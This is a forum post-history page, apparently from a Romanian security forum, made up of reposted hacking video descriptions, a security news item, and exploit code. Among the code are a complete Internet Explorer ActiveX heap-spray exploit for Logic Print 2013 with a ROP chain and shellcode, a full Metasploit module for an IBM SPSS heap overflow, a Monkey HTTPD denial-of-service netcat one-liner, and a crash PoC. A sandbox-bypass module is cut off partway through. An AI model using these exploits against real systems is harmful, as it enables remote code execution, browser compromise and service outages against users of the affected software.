-
Posts
638 -
Joined
-
Last visited
-
Days Won
1
Everything posted by Kwelwild
-
Description: It still amazes me that after all this time there is still more to learn about NTFS. Over the past year or so David has been working on a tool to exploit the $LOGFILE and $USNJRNL on NTFS. These can provide us with a significant amount of historical information on file system activity, including identifying file movements and changes. In this presentation David also demonstrated the triforce tool, the amount of information it recovers is quite astounding. This is something that will change they way you do forensics forever, whether you are doing malware, intrusion or LE investigations. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ntfs Triforce Or Anti Anti Forensics By David Cowen And Matt Seyer
-
Description: In this video you will learn how to bypass MAC Filtering on a wireless network. We are using MAC filtering for making our connection more secure so that particular selected user will join to our network but the funny fact is using Aircrack-ng we can also see the MAC addresses of the connected users and what next - we just need to change the Mac address using some MAC Changer utility and there we go we can access the network if we have correct password Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Bypass Mac Filtering On A Wireless Network
-
Logic Print 2013 - Stack Overflow (vTable Overwrite) <!-- Exploit Title: Logic Print 2013 stack overflow (vTable overwrite) Software Link: http://www.logic-print.com/ Tested on: Win XP SP3 French + Internet Explorer 8 Date: 29/05/2013 Author: h1ch4m (Hicham Oumounid) Email: h1ch4m@live.fr Twitter: @o_h1ch4m Thanks to corelanc0d3r for: "DEPS" - Precise heap spray for FF/IE8/IE9/IE10 Well, the bug isn't in the app itself, but in a third party dll "PDF In-The-Box" from http://www.synactis.com Logic Print 2013 uses an old version of the dll, new ones aren't affected, the ROP is from an os dll: [msi.dll] (C:\WINDOWS\system32\msi.dll) 3.1.4001.5512 --> <html> <head> <OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="xploit"></OBJECT> </head> <body OnLoad="xploit();"> <div id="blah"></div> <script language="javascript"> var rop = ""; var shellcode = ""; var junk1 = ''; var junk2 = ''; function theMagicalMysteryTour() { rop = unescape("%u2230%u2030" + ///////////////////////////////////////////// /// STACK PIVOT /// ///////////////////////////////////////////// "%u370d%u7d20" + // 0x7d20370d : # XCHG EAX,ESP # ADD DWORD PTR DS:[EAX],EAX # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04 ** [msi.dll] ** | ascii "%u4141%u4141" + "%u0116%u7d2e" + // 0x7d2e0116 : # RETN ** [msi.dll] ** | ascii "%u4141%u4141" + ///////////////////////////////////////////// /// ECX = lpOldProtect (ptr to W address) /// ///////////////////////////////////////////// "%u1815%u7d21" + // 0x7d211815 : # POP ECX # RETN [msi.dll] "%u4070%u7D3B" + // 0x7D3B4070 : # &Writable location [msi.dll] ///////////////////////////////////////////// /// EDX = NewProtect (0x40) /// ///////////////////////////////////////////// "%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll] "%uFFC0%uFFFF" + // 0xFFFFFFBF "%u66d7%u7d2e" + // 0x7d2e66d7 : # NEG EAX # RETN 0x04 ** [msi.dll] "%u23dc%u7d20" + // 0x7d2023dc : # XCHG EAX,EDX # RETN ** [msi.dll] "%u4141%u4141" + ///////////////////////////////////////////// /// EBX = dwSize /// ///////////////////////////////////////////// "%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll] "%uFAFF%uFFFF" + // 0xFFFFFAFF "%u66d7%u7d2e" + // 0x7d2e66d7 : # NEG EAX # RETN 0x04 ** [msi.dll] "%u29ac%u7d24" + // 0x7d2429ac : # XCHG EAX,EBX # OR EAX,14C48300 # POP EBP # RETN 0x08 ** [msi.dll] "%u4141%u4141" + "%u4141%u4141" + "%u0116%u7d2e" + // 0x7d2e0116 : # RETN ** [msi.dll] ** | ascii "%u4141%u4141" + "%u4141%u4141" + ///////////////////////////////////////////// /// ESI = ptr to VirtualProtect() /// /// EBP = ReturnTo (ptr to jmp esp) /// ///////////////////////////////////////////// "%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll] "%u1318%u6358" + // 0x63581318 : # ptr to VirtualProtect() [mshtml.dll] "%uf84a%u7d3a" + // 0x7d3af84a : # MOV EAX,DWORD PTR DS:[EAX] # RETN ** [msi.dll] "%u0622%u7d36" + // 0x7d360622 : # PUSH EAX # POP ESI # POP EBP # RETN 0x04 ** [msi.dll] "%ub275%u7d24" + // 0x7d24b275 : # jmp esp ///////////////////////////////////////////// /// EDI = ROP NOP (RETN) /// ///////////////////////////////////////////// "%u2669%u7d20" + // 0x7d202669 : # POP EDI # RETN ** [msi.dll] "%u4141%u4141" + "%u0116%u7d2e" + // 0x7d2e0116 : # RETN ** [msi.dll] ** | ascii ///////////////////////////////////////////// /// EAX = NOP (0x90909090) /// ///////////////////////////////////////////// "%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll] "%u9090%u9090" + ///////////////////////////////////////////// /// PUSH IT & GET IT /// ///////////////////////////////////////////// "%uc08e%u7d27" + // 0x7d27c08e : # PUSHAD # RETN ** [msi.dll] ""); // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); } function DEPS() { var div_container = document.getElementById("blah"); div_container.style.cssText = "display:none"; var data; offset = 0x104; junk = unescape("%u2020%u2020"); while (junk.length < 0x1000) junk += junk; data = junk.substring(0,offset) + rop + shellcode data += junk.substring(0,0x800-offset-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); div_container.appendChild(obj); } } function xploit() { theMagicalMysteryTour(); DEPS(); // MOV EAX,DWORD PTR SS:[EBP-10]; the stack is overflowed, ebp-10 is put in eax then >>>>|| // MOV ECX,DWORD PTR DS:[EAX]; || // CALL DWORD PTR DS:[ECX-4]; BOOOOOOOOOOOM <<<<|| EAX = "\x28\x22\x30\x20"; // 0x20302228 heap adress " Corelan "DEPS" - Precise heap spray " while (junk1.length < 189) junk1 += "\x41"; while (junk2.length < 7000) junk2 += "\x41"; var xploit = document.getElementById("xploit"); xploit.ConnectToSynactis(junk1+EAX+junk2); } </script> </body> </html> Sursa: Logic Print 2013 - Stack Overflow (vTable Overwrite)
-
Monkey HTTPD 1.1.1 - Crash PoC Title: ====== Monkey HTTPD 1.1.1 - Denial of Service Vulnerability Date: ===== 2013-05-28 References: =========== http://bugs.monkey-project.com/ticket/181 Introduction: ============= Monkey is a lightweight and powerful web server for GNU/Linux. It has been designed to be very scalable with low memory and CPU consumption, the perfect solution for embedded devices. Made for ARM, x86 and x64. Abstract: ========= The vulnerability is a denial of service which is caused by sending a null byte in an HTTP request to the web server. Report-Timeline: ================ 2013-05-23: Discovered vulnerability via fuzzing 2013-05-25: Vendor Notification 2013-05-26: Vendor Response/Feedback 2013-05-27: Vendor Fix/Patch 2013-05-28: PublicDisclosure Status: ======== Published Affected Products: ================== Monkey HTTPD - version 1.1.1 Exploitation-Technique: ======================= Remote Details: ======== A bug discovered in Monkey's HTTP parser allows an attacker to cause a segmentation fault in one of the daemon's threads using a specially crafted request containing a null byte. An attacker can crash all the available threads by sending the specially crafted request multiple times, rendering the server useless for legitimate users. Proof of Concept: ================= The vulnerability can be exploited by remote attacker without any special privileges. The placement of the null byte within the request does not seem to have any effect on the result. The null byte may even be used instead of an HTTP method such as, GET. Below is an example of how this bug can be manually triggered: ruby -e 'puts "GET /\x00 HTTP/1.1\r\n\r\n"'|netcat localhost 2001 Solution: ========= This vulnerability has been fixed for the 1.2.0 release. Risk: ===== The security risk of the redirection vulnerability is estimated as low(+). Credits: ======== Doug Prostko <dougtko[at]gmail[dot]com> - Vulnerability discovery Sursa: Monkey HTTPD 1.1.1 - Crash PoC
-
Wtf?! Tot la LOIC ati ramas ma?! Bullshit!
-
Un soft gratuit creat de specialistii romani in securitate iti ofera protectie impotriva virusilor sau phishingului Utilizatorii de LinkedIn au acum acces gratuit la un software de securitate de la Bitdefender prin LinkedIn Safety Center, soft care le ofera protectie impotriva furtului de date personale sau virusilor. Centrul de Securitate al LinkedIn este conceput sa furnizeze celor peste 225 de milioane de membri ai retelei instumentele si informatiile necesare pentru protectia identitatii si a datelor personale pe internet. Business-urile si profesionistii reprezinta tinte valoroase pentru criminalii informatici care urmaresc furtul de identitate, fraudele bancare sau alte tipuri de escrocherii cibernetice (Catalin Cosoi, Chief Security Strategist, Bitdefender) Prin intermediul Centrului de Securitate al LinkedIn, Bitdefender furnizeaza companiilor mici si profesionistilor protectie completa impotriva virusilor, a phishingului si a altor amenintari online, printr-o sesiune de testare gratuita, de trei luni, a doua produse importante din portofoliu. Bitdefender Cloud Security for Small Businesses implementeaza tehnologiile de securitate recunoscute la nivel global, pentru a asigura companiilor mici protectie si control de la distanta, tehnologii anti-phishing, control al productivitatii si alte beneficii adaptate utilizatorilor din mediul de business. Bitdefender Total Security 2013 furnizeaza membrilor LinkedIn securitate pe retelele sociale, cea mai eficienta protectie anti-malware, filtru de spam, anti-phishing, criptarea continutului transmis prin chat etc. Sursa: Bitdefender iti protejeaza gratuit contul de LinkedIn - www.yoda.ro
-
CodeBlocks 12.11 (Mac OS X) - Crash POC # Exploit Title: CodeBlocks 12.11 (Mac OS X) Crash POC # Date: 27-05-2013 # Exploit Author: ariarat # Vendor Homepage: http://www.codeblocks.org # Software Link: http://sourceforge.net/projects/codeblocks/files/Binaries/12.11/MacOS/codeblocks-12.11-mac.dmg # Version: 12.11 # Tested on: [ Mac OS X 10.7.5] #============================================================================================ # in Search -> Find in files... -> Text to search for: type any character! # *** path in [Search path] section must be blank *** #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python filename="string.txt" buffer = "\x41" * 1000 textfile = open(filename , 'w') textfile.write(buffer) textfile.close() Sursa: CodeBlocks 12.11 (Mac OS X) - Crash POC
-
IBM SPSS SamplePower C1Tab ActiveX Heap Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => NormalRanking, :classid => "{24E04EBF-014D-471F-930E-7654B1193BA9}", :method => "TabCaption" }) def initialize(info={}) super(update_info(info, 'Name' => "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow", 'Description' => %q{ This module exploits a heap based buffer overflow in the C1Tab ActiveX control, while handling the TabCaption property. The affected control can be found in the c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', # Vulnerability discovery 'juan vazquez' # Metasploit ], 'References' => [ [ 'CVE', '2012-5946' ], [ 'OSVDB', '92845' ], [ 'BID', '59559' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ] ], 'Payload' => { 'Space' => 991, 'BadChars' => "\x00", 'DisableNops' => true }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c08 } ], [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c08 } ], [ 'IE 8 on Windows XP SP3', { 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c, 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret } ], [ 'IE 8 on Windows 7', { 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c, 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret } ] ], 'Privileged' => false, 'DisclosureDate' => "Apr 26 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end print_status("target not found #{agent}") return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0c0c # For IE 6, 7, 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def rop_chain # gadgets from c1sizer.ocx rop_gadgets = [ 0x0c0c0c10, 0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack 0x100076f1, # pop eax # ret 0x10029134, # &VirtualAllox 0x1001b41e, # jmp [eax] 0x0c0c0c34, # ret address 0x0c0c0c0c, # lpAddress 0x00001000, # dwSize 0x00001000, # flAllocationType 0x00000040 # flProtect ].pack("V*") return rop_gadgets end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. if (t.name =~ /IE 6/ or t.name =~ /IE 7/) fake_memory = [ 0x0c0c0c10, 0x0c0c0c14 ].pack("V*") return fake_memory + code end return rop_chain + stack_pivot + code end # Objects filling aren't randomized because # this combination make exploit more reliable. def fake_object(size) object = "B" * 8 # metadata object << "D" * size # fake object return object end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end # Check the memory layout documentation at the end of the module def overflow_xp buf = rand_text_alpha(0x10000) # Start to overflow buf << fake_object(0x40) buf << fake_object(0x30) buf << fake_object(0x30) buf << fake_object(0x40) buf << fake_object(0x10) buf << fake_object(0x10) buf << fake_object(0x20) buf << fake_object(0x10) buf << fake_object(0x30) buf << "B" * 0x8 # metadata chunk buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object end # Check the memory layout documentation at the end of the module def overflow_xp_ie8 buf = [ junk, # padding 0x1001b557, # pop eax # c1sizer.ocx 0x0c0c0c14, # eax 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap ].pack("V*") buf << rand_text_alpha(0x10000-16) # Start to overflow buf << "B" * 0x8 # metadata chunk buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object end # Check the memory layout documentation at the end of the module def overflow_w7 buf = [ junk, # padding 0x1001b557, # pop eax # c1sizer.ocx 0x0c0c0c14, # eax 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap ].pack("V*") buf << rand_text_alpha(0x10000-16) # Start to oveflow buf << fake_object(0x3f8) buf << fake_object(0x1a0) buf << fake_object(0x1e0) buf << fake_object(0x1a0) buf << fake_object(0x1e0) buf << fake_object(0x1a0) buf << "B" * 0x8 # metadata chunk buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object end def get_overflow(t) if t.name =~ /Windows 7/ return overflow_w7 elsif t.name =~ /Windows XP/ and t.name =~ /IE 8/ return overflow_xp_ie8 elsif t.name =~ /Windows XP/ return overflow_xp end end # * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer. # * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer. # * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the # TabCaption property. def trigger_w7 target = rand_text_alpha(5 + rand(3)) target2 = rand_text_alpha(5 + rand(3)) target3 = rand_text_alpha(5 + rand(3)) target4 = rand_text_alpha(5 + rand(3)) target5 = rand_text_alpha(5 + rand(3)) target6 = rand_text_alpha(5 + rand(3)) target7 = rand_text_alpha(5 + rand(3)) target8 = rand_text_alpha(5 + rand(3)) target9 = rand_text_alpha(5 + rand(3)) target10 = rand_text_alpha(5 + rand(3)) target11 = rand_text_alpha(5 + rand(3)) target12 = rand_text_alpha(5 + rand(3)) target13 = rand_text_alpha(5 + rand(3)) target14 = rand_text_alpha(5 + rand(3)) target15 = rand_text_alpha(5 + rand(3)) objects = %Q| <object id="#{target}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target2}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target3}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target4}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target5}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target6}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target7}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target8}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target9}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target10}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target11}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target12}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target13}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target14}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> <object id="#{target15}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> | return objects, target7 end # * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just # an object is sufficient to overflow itself and get control execution. def trigger_xp target = rand_text_alpha(5 + rand(3)) objects = %Q| <object id="#{target}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object> | return objects, target end def get_trigger(t) if t.name =~ /Windows 7/ return trigger_w7 elsif t.name =~ /Windows XP/ return trigger_xp end end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) buf = get_overflow(my_target) objects, target_object = get_trigger(my_target) html = %Q| <html> <head> </head> <body> #{objects} <script> CollectGarbage(); #{js} #{target_object}.Caption = ""; #{target_object}.TabCaption(0) = "#{buf}"; </script> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin [*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test Heap entries for Segment01 in Heap 01ca0000 address: psize . size flags state (requested size) 025c0000: 00000 . 00040 [01] - busy (40) 025c0040: 00040 . 10008 [01] - busy (10000) 025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer 025e0050: 10008 . 00048 [01] - busy (40) 025e0098: 00048 . 00038 [01] - busy (30) 025e00d0: 00038 . 00038 [01] - busy (30) 025e0108: 00038 . 00048 [01] - busy (40) 025e0150: 00048 . 00018 [01] - busy (10) 025e0168: 00018 . 00018 [01] - busy (10) 025e0180: 00018 . 00028 [01] - busy (20) 025e01a8: 00028 . 00018 [01] - busy (10) 025e01c0: 00018 . 00010 [00] 025e01d0: 00010 . 00038 [01] - busy (30) 025e0208: 00038 . 001e8 [01] - busy (1e0) // Vulnerable object 025e03f0: 001e8 . 001a8 [01] - busy (1a0) [*] Windows XP / ie8 memory layout at oveflow, based on empirical test Heap entries for Segment01 in Heap 03350000 address: psize . size flags state (requested size) 03840000: 00000 . 00040 [01] - busy (40) 03840040: 00040 . 10008 [01] - busy (10000) 03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer 03860050: 10008 . 001e8 [01] - busy (1e0) // Vulnerable object 03860238: 001e8 . 001a8 [01] - busy (1a0) 038603e0: 001a8 . 00078 [00] 03860458: 00078 . 00048 [01] - busy (40) 038604a0: 00048 . 00048 [01] - busy (40) 038604e8: 00048 . 00618 [01] - busy (610) 03860b00: 00618 . 10208 [01] - busy (10200) 03870d08: 10208 . 032f8 [10] 03874000: 000cc000 - uncommitted bytes. [*] windows 7 / ie8 memory layout at oveflow, based on empirical test 03240000: 00000 . 00040 [101] - busy (3f) 03240040: 00040 . 10008 [101] - busy (10000) 03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer 03260050: 10008 . 00400 [101] - busy (3f8) Internal 03260450: 00400 . 001a8 [101] - busy (1a0) 032605f8: 001a8 . 001e8 [101] - busy (1e0) 032607e0: 001e8 . 001a8 [101] - busy (1a0) 03260988: 001a8 . 001e8 [101] - busy (1e0) 03260b70: 001e8 . 001a8 [101] - busy (1a0) 03260d18: 001a8 . 001e8 [101] - busy (1e0) # Our vulnerable object, target7, seems reliable according to testing 03260f00: 001e8 . 001a8 [101] - busy (1a0) 032610a8: 001a8 . 001e8 [101] - busy (1e0) 03261290: 001e8 . 001a8 [101] - busy (1a0) 03261438: 001a8 . 001e8 [101] - busy (1e0) 03261620: 001e8 . 001a8 [101] - busy (1a0) 032617c8: 001a8 . 001e8 [101] - busy (1e0) [*] Overflow: .text:100146E1 push eax ; lpString2 .text:100146E2 push CaptionlpBuffer ; lpString1 .text:100146E8 call ds:lstrcatA ; Heap Overflow when setting a new CaptionString > 0x10000 [*] Get Control after overflow: .text:1001A40D call overflow_sub_1001469E ; Overflow happens here .text:1001A412 mov ecx, edi ; edi points to the overflowed object, then ecx (this) .text:1001A414 call get_control_sub_100189EC ; Get profit from the overflowed object here .text:100189EC get_control_sub_100189EC proc near ; CODE XREF: sub_1001A1A9+B6p .text:100189EC ; SetTabCaption_sub_1001A2EC+128p ... .text:100189EC .text:100189EC var_4 = dword ptr -4 .text:100189EC .text:100189EC push ebp .text:100189ED mov ebp, esp .text:100189EF push ecx .text:100189F0 mov eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled .text:100189F3 and [ebp+var_4], 0 .text:100189F7 test eax, eax .text:100189F9 jz short locret_10018A23 .text:100189FB mov ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled .text:100189FD lea edx, [ebp+var_4] .text:10018A00 push edx .text:10018A01 push offset unk_1002B628 .text:10018A06 push eax .text:10018A07 call dword ptr [ecx] # woot! =end Sursa: IBM SPSS SamplePower C1Tab ActiveX Heap Overflow
-
Description: Maligno is an open source penetration testing tool written in python, that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission. Maligno can be downloaded from Encripto AS - Tools Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Maligno - Metasploit Payload Server
-
- 1
-
Description: In this video you will learn how to Crack WPA-2 Encryption using Cowpatty and Genpmk tool and how you can increase your speed for the cracking process. CowPatty is a very good tool for cracking wireless network and genpmk is a generate rainbow table for password cracking and this tool help Cowpatty to crack the password faster. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Speed Cracking Wpa And Wpa2 With Cowpatty And Genpmk
-
Description: In this video you will learn how to use Scapy for packet injection. Scapy is a very powerful library for python. Using Scapy you can develop hardcore task in a very easy way and with small peice of code. Scapy : - Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Packet Injection With Scapy
-
Description: In this video you will learn how to attack on DVWA using Tautological Statement Injection. Tautological always true fragment into a WHERE clause of the SQL statement. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Sql Injection - Tautological Statement Injection
-
Description: In this video you will learn how to use AirSnare a wireless IDS software for analysis and monitoring the air for security. So this video will cover how to use this tool and setup configuration etc .. About AirSnare : - AirSnare is another tool to add to your Wireless Intrusion Detection Toolbox. AirSnare will alert you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place. If AirSnare detects an unfriendly MAC address you have the option of tracking the MAC address's access to IP addresses and ports or by launching Ethereal upon a detection. AirSnare - Intrusion Detection Software for Windows Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Airsnare - Wireless (Ids) Intrusion Detection System
-
Description: In this video you will learn how to use CUPP(Common User Password Profiler ) tool and Python for cracking the password. CUPP is a one type of social engineering tool and provides you a password wordlist. CUPP : - remote-exploit.org Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Target Specific Password Cracking With Cupp And Python
-
Felicitari, poate te vad pe HoF.
-
AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' require 'msf/core/post/common' require 'msf/core/post/file' class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Registry def initialize(info={}) super(update_info(info, { 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', 'Description' => %q{ This module exploits a vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing to achieve Medium Integrity Level 